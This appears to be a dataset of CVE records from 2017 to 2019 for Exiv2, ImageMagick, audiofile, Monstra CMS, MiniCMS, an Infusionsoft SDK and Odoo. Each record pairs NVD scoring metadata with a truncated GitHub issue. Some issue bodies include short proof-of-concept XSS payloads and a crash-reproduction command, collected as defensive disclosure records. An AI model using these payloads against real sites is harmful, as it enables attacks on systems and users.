https://api.github.com/repos/Exiv2/exiv2/issues/845/comments
2
2019-05-13T13:42:43Z
2019-07-01T09:04:40Z
https://github.com/Exiv2/exiv2/issues/845
443,405,977
845
463
CVE-2019-13113
2019-06-30T23:15:10.207
Exiv2 through 0.27.1 allows an attacker to cause a denial of service (crash due to assertion failure) via an invalid data location in a CRW image file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/issues/841" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Exiv2/exiv2/pull/842" }...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E", "versionEndExcluding": null, "versionEndIncluding": "0.27.1", "versionStartExcluding"...
[ "617" ]
617
https://github.com/Exiv2/exiv2/issues/841
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
The attached file causes an assertion failure in `exiv2`. ![issue_841_poc](https://user-images.githubusercontent.com/4358136/57619635-45452800-757e-11e9-8496-9e198b7f53f4.jpg) Reproducible on the 0.27-maintenance branch ([f4a37c6](https://github.com/Exiv2/exiv2/commit/f4a37c63f2f890c16ff7192fc89a75a7c34ae82b)): ...
Invalid data location in CRW image causes exiv2 to crash
https://api.github.com/repos/Exiv2/exiv2/issues/841/comments
3
2019-05-13T11:53:23Z
2019-07-01T09:05:47Z
https://github.com/Exiv2/exiv2/issues/841
443,356,775
841
464
CVE-2019-13114
2019-06-30T23:15:10.267
http.c in Exiv2 through 0.27.1 allows a malicious http server to cause a denial of service (crash due to a NULL pointer dereference) by returning a crafted response that lacks a space character.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00009.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/E...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:exiv2:exiv2:*:*:*:*:*:*:*:*", "matchCriteriaId": "4BFA28DF-4BFE-4CA7-A2F7-F471F91B856E", "versionEndExcluding": null, "versionEndIncluding": "0.27.1", "versionStartExcluding"...
[ "476" ]
476
https://github.com/Exiv2/exiv2/issues/793
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "Exiv2", "exiv2" ]
There is a null pointer deference bug at [http.cpp:364](https://github.com/Exiv2/exiv2/blob/55dfdb9ab007d6e6d1d06240048690eaac23b305/src/http.cpp#L364). If the http server sends back a reply that does not contain a space character, then `strchr` will return `NULL`, leading to a null pointer dereference in `atoi`. To...
null pointer dereference in http.cpp
https://api.github.com/repos/Exiv2/exiv2/issues/793/comments
4
2019-04-24T20:14:50Z
2019-07-01T09:07:49Z
https://github.com/Exiv2/exiv2/issues/793
436,886,165
793
465
CVE-2019-13133
2019-07-01T20:15:11.180
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https:...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "F8AB2B06-598F-4F38-813C-B1E3E1E7EEE5", "versionEndExcluding": "7.0.8-50", "versionEndIncluding": null, "versionS...
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1600
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) iss...
Memory leak in ReadBMPImage in coder/bmp.c and ReadVIFFImage in coder/viff.c.
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1600/comments
2
2019-06-18T10:55:16Z
2019-07-03T01:29:51Z
https://github.com/ImageMagick/ImageMagick/issues/1600
457,401,228
1,600
466
CVE-2019-13135
2019-07-01T20:15:11.337
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageM...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "BF97F7CB-3E80-4DBB-8854-FF5C012BA0FA", "versionEndExcluding": "6.9.10-50", "versionEndIncluding": null, "version...
[ "908" ]
908
https://github.com/ImageMagick/ImageMagick/issues/1599
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ y ] I have written a descriptive issue title - [ y ] I have verified that I am using the latest version of ImageMagick - [ y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) iss...
Use of uninitialized value in function ReadCUTImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1599/comments
2
2019-06-18T10:33:40Z
2019-07-03T01:30:23Z
https://github.com/ImageMagick/ImageMagick/issues/1599
457,391,875
1,599
467
CVE-2019-13136
2019-07-01T20:15:11.417
ImageMagick before 7.0.8-50 has an integer overflow vulnerability in the function TIFFSeekCustomStream in coders/tiff.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/fe5f4b85e6...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "024CF82C-BA9A-441D-80DD-BDA9FEC819A7", "versionEndExcluding": "7.0.8-50", "versionEndIncluding": null, "versionS...
[ "190" ]
190
https://github.com/ImageMagick/ImageMagick/issues/1602
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ y ] I have written a descriptive issue title - [ y ] I have verified that I am using the latest version of ImageMagick - [ y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) iss...
Possible integer overflow in TIFFSeekCustomStream in coder/tiff.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1602/comments
2
2019-06-18T11:47:50Z
2019-07-03T01:30:44Z
https://github.com/ImageMagick/ImageMagick/issues/1602
457,432,764
1,602
468
CVE-2019-13137
2019-07-01T20:15:11.493
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadPSImage in coders/ps.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageM...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "BF97F7CB-3E80-4DBB-8854-FF5C012BA0FA", "versionEndExcluding": "6.9.10-50", "versionEndIncluding": null, "version...
[ "401" ]
401
https://github.com/ImageMagick/ImageMagick/issues/1601
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) iss...
Memory leak in ReadPSImage in coder/ps.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1601/comments
2
2019-06-18T11:02:58Z
2019-07-03T01:31:05Z
https://github.com/ImageMagick/ImageMagick/issues/1601
457,404,400
1,601
469
CVE-2019-13147
2019-07-02T00:15:10.397
In Audio File Library (aka audiofile) 0.3.6, there exists one NULL pointer dereference bug in ulaw2linear_buf in G711.cpp in libmodules.a that allows an attacker to cause a denial of service via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mpruett/audiofile/issues/54" }, { "source": "cve@mitre.org", "tags": [ "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00006....
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:audio_file_library_project:audio_file_library:0.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "47CD841B-F23D-41F5-B31D-51A7B377BA75", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "476" ]
476
https://github.com/mpruett/audiofile/issues/54
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mpruett", "audiofile" ]
There exists one NULL pointer dereference bug in ulaw2linear_buf, in G711.cpp, which allows an attacker to cause a denial of service via a crafted file. To reproduce with the attached poc file: ./sfconvert poc output format voc [poc.zip](https://github.com/mpruett/audiofile/files/3341808/poc.zip) gdb output ``...
NULL pointer dereference bug in ulaw2linear_buf, in G711.cpp
https://api.github.com/repos/mpruett/audiofile/issues/54/comments
5
2019-06-29T11:37:12Z
2023-11-11T17:47:19Z
https://github.com/mpruett/audiofile/issues/54
462,294,180
54
470
CVE-2018-11227
2019-07-03T16:15:09.943
Monstra CMS 3.0.4 and earlier has XSS via index.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/monstra-cms/monstra/issues/438" }, { "source"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "66ED6E31-8A36-442A-861E-1279221D75BB", "versionEndExcluding": "3.0.4", "versionEndIncluding": null, "versionStartExc...
[ "79" ]
79
https://github.com/monstra-cms/monstra/issues/438
[ "Third Party Advisory" ]
github.com
[ "monstra-cms", "monstra" ]
Hello team :) I found xss at index page I reported to the cve platform, they let me use CVE-2018-11227, you can contact them for details Request GET /test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1 HTTP/1.1 Host: 192.168.1.106 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0 ...
Monstra XSS Vulnerability @Awilum
https://api.github.com/repos/monstra-cms/monstra/issues/438/comments
1
2018-05-17T00:21:08Z
2019-07-04T10:28:06Z
https://github.com/monstra-cms/monstra/issues/438
323,831,067
438
471
CVE-2017-6216
2019-07-03T17:15:09.440
novaksolutions/infusionsoft-php-sdk v2016-10-31 is vulnerable to a reflected XSS in the leadscoring.php resulting code execution
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/novaksolutions/infusionsoft-php-sdk/issues/111" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "ur...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:novaksolutions:infusionsoft-php-sdk:2016-10-31:*:*:*:*:*:*:*", "matchCriteriaId": "5B44A3F9-1A76-4042-80D5-1A4434380617", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "79" ]
79
https://github.com/novaksolutions/infusionsoft-php-sdk/issues/111
[ "Exploit", "Third Party Advisory" ]
github.com
[ "novaksolutions", "infusionsoft-php-sdk" ]
Hello: I found a Reflected XSS vulnerability in this sdk. The vulnerability exists due to insufficient filtration of user-supplied data in 'ContactId' HTTP _REQUEST parameter that will be passed to “infusionsoft-php-sdk-master/Infusionsoft/examples/leadscoring.php”. The infected source code is line 2, there is no p...
A Reflected XSS vulnerability in this sdk
https://api.github.com/repos/novaksolutions/infusionsoft-php-sdk/issues/111/comments
1
2017-02-23T03:41:11Z
2017-04-25T15:06:02Z
https://github.com/novaksolutions/infusionsoft-php-sdk/issues/111
209,655,418
111
472
CVE-2019-13186
2019-07-03T17:15:10.407
In MiniCMS V1.10, stored XSS was found in mc-admin/post-edit.php via the tags box. An attacker can use it to get a user's cookie. This is different from CVE-2018-10296, CVE-2018-16233, and CVE-2018-20520.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/bg5sbk/MiniCMS/issues/31" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.co...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:1234n:minicms:1.10:*:*:*:*:*:*:*", "matchCriteriaId": "1EAC73A0-FD32-4344-A4F5-BB6D3D1B7DA7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "79" ]
79
https://github.com/bg5sbk/MiniCMS/issues/31
[ "Exploit", "Third Party Advisory" ]
github.com
[ "bg5sbk", "MiniCMS" ]
A stored XSS was found in mc-admin/post-edit.php.This vulnerability is similar to CVE-2018-10296 but at a different place. POC: Firstly,enter the /MiniCMS/mc-admin/post-edit.php page and write the payload” <script>alert(document.domain)</script>” into the tags box: ![1](https://user-images.githubusercontent.com/25...
A stored XSS was found in mc-admin/post-edit.php.
https://api.github.com/repos/bg5sbk/MiniCMS/issues/31/comments
0
2019-07-03T05:22:37Z
2021-07-19T17:35:35Z
https://github.com/bg5sbk/MiniCMS/issues/31
463,549,862
31
473
CVE-2018-14866
2019-07-03T18:15:10.317
Incorrect access control in the TransientModel framework in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated attackers to access data in transient records that they do not own by making an RPC call before garbage collection occurs.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32509" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "732" ]
732
https://github.com/odoo/odoo/issues/32509
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-9 Incorrect access control in the TransientModel framework in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated attackers to access data in transient records that they do not own by making an RPC call before garbage collection occurs. **...
[SEC] ODOO-SA-2018-08-07-9 (CVE-2018-14866) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32509/comments
0
2019-04-08T13:37:46Z
2019-04-08T13:37:49Z
https://github.com/odoo/odoo/issues/32509
430,456,694
32,509
474
CVE-2018-14861
2019-07-03T19:15:10.503
Improper data access control in Odoo Community 10.0 and 11.0 and Odoo Enterprise 10.0 and 11.0 allows authenticated users to perform a CSV export of the secure hashed passwords of other users.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32506" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*", "matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "732" ]
732
https://github.com/odoo/odoo/issues/32506
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-6 Improper data access control in Odoo Community 10.0 and 11.0 and Odoo Enterprise 10.0 and 11.0 allows authenticated users to perform a CSV export of the secure hashed passwords of other users. **Affects**: Odoo 10.0, 11.0 (Community and Enterprise Editions) **Component**: Od...
[SEC] ODOO-SA-2018-08-07-6 (CVE-2018-14861) - Improper data access control in...
https://api.github.com/repos/odoo/odoo/issues/32506/comments
0
2019-04-08T13:37:39Z
2019-04-08T13:37:41Z
https://github.com/odoo/odoo/issues/32506
430,456,630
32,506
475
CVE-2018-14862
2019-07-03T19:15:10.580
Incorrect access control in the mail templating system in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated internal users to delete arbitrary menuitems via a crafted RPC request.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE"...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32504" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "732" ]
732
https://github.com/odoo/odoo/issues/32504
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-4 Incorrect access control in the mail templating system in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated internal users to delete arbitrary menuitems via a crafted RPC request. **Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterp...
[SEC] ODOO-SA-2018-08-07-4 (CVE-2018-14862) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32504/comments
0
2019-04-08T13:37:34Z
2019-04-08T13:37:36Z
https://github.com/odoo/odoo/issues/32504
430,456,583
32,504
476
CVE-2018-14863
2019-07-03T19:15:10.643
Incorrect access control in the RPC framework in Odoo Community 8.0 through 11.0 and Odoo Enterprise 9.0 through 11.0 allows authenticated users to call private functions via RPC.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL"...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32508" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "284" ]
284
https://github.com/odoo/odoo/issues/32508
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-8 Incorrect access control in the RPC framework in Odoo Community 8.0 through 11.0 and Odoo Enterprise 9.0 through 11.0 allows authenticated users to call private functions via RPC. **Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions) **Component**: Odoo Frame...
[SEC] ODOO-SA-2018-08-07-8 (CVE-2018-14863) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32508/comments
0
2019-04-08T13:37:44Z
2019-04-08T13:37:45Z
https://github.com/odoo/odoo/issues/32508
430,456,676
32,508
477
CVE-2018-14864
2019-07-03T19:15:10.707
Incorrect access control in asset bundles in Odoo Community 9.0 through 11.0 and earlier and Odoo Enterprise 9.0 through 11.0 and earlier allows remote authenticated users to inject arbitrary web script via a crafted attachment.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32502" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:8.0:*:*:*:community:*:*:*", "matchCriteriaId": "705E446A-98DC-43D6-905A-F52E3FDCAF48", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "284" ]
284
https://github.com/odoo/odoo/issues/32502
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-2 Incorrect access control in asset bundles in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows remote authenticated users to inject arbitrary web script via a crafted attachment. **Affects**: Odoo 8.0, 9.0, 10.0 (Community and Enterprise Editions) *...
[SEC] ODOO-SA-2018-08-07-2 (CVE-2018-14864) - Incorrect access control in ass...
https://api.github.com/repos/odoo/odoo/issues/32502/comments
0
2019-04-08T13:37:25Z
2019-04-08T13:37:30Z
https://github.com/odoo/odoo/issues/32502
430,456,495
32,502
478
CVE-2018-14865
2019-07-03T19:15:10.767
Report engine in Odoo Community 9.0 through 11.0 and earlier and Odoo Enterprise 9.0 through 11.0 and earlier does not use secure options when passing documents to wkhtmltopdf, which allows remote attackers to read local files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32501" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "200" ]
200
https://github.com/odoo/odoo/issues/32501
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-1 Report engine in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier does not use secure options when passing documents to wkhtmltopdf, which allows remote attackers to read local files. **Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions) *...
[SEC] ODOO-SA-2018-08-07-1 (CVE-2018-14865) - Report engine in Odoo Community...
https://api.github.com/repos/odoo/odoo/issues/32501/comments
0
2019-04-08T13:37:23Z
2019-04-08T13:37:25Z
https://github.com/odoo/odoo/issues/32501
430,456,471
32,501
479
CVE-2018-14859
2019-07-03T20:15:10.777
Incorrect access control in the password reset component in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated users to reset the password of other users by being the first party to use the secure token.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL"...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32510" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*", "matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "284" ]
284
https://github.com/odoo/odoo/issues/32510
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
# Security Advisory - ODOO-SA-2018-08-07-10 Incorrect access control in the password reset component in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated users to reset the password of other users by being the first party to use the secure token. **Affects**: Odoo 9.0, 10.0, 11...
[SEC] ODOO-SA-2018-08-07-10 (CVE-2018-14859) - Incorrect access control in the...
https://api.github.com/repos/odoo/odoo/issues/32510/comments
0
2019-04-08T13:37:50Z
2019-04-08T13:37:51Z
https://github.com/odoo/odoo/issues/32510
430,456,723
32,510
480
CVE-2018-14860
2019-07-03T20:15:10.837
Improper sanitization of dynamic user expressions in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated privileged users to escape from the dynamic expression sandbox and execute arbitrary code on the hosting system.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo/odoo/issues/32505" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/odoo...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*", "matchCriteriaId": "D9126A1A-FA35-4127-91B3-A3FA8B26FABB", "versionEndExcluding": null, "versionEndIncluding": "11.0", "versionStartExclud...
[ "78" ]
78
https://github.com/odoo/odoo/issues/32505
[ "Patch", "Third Party Advisory" ]
github.com
[ "odoo", "odoo" ]
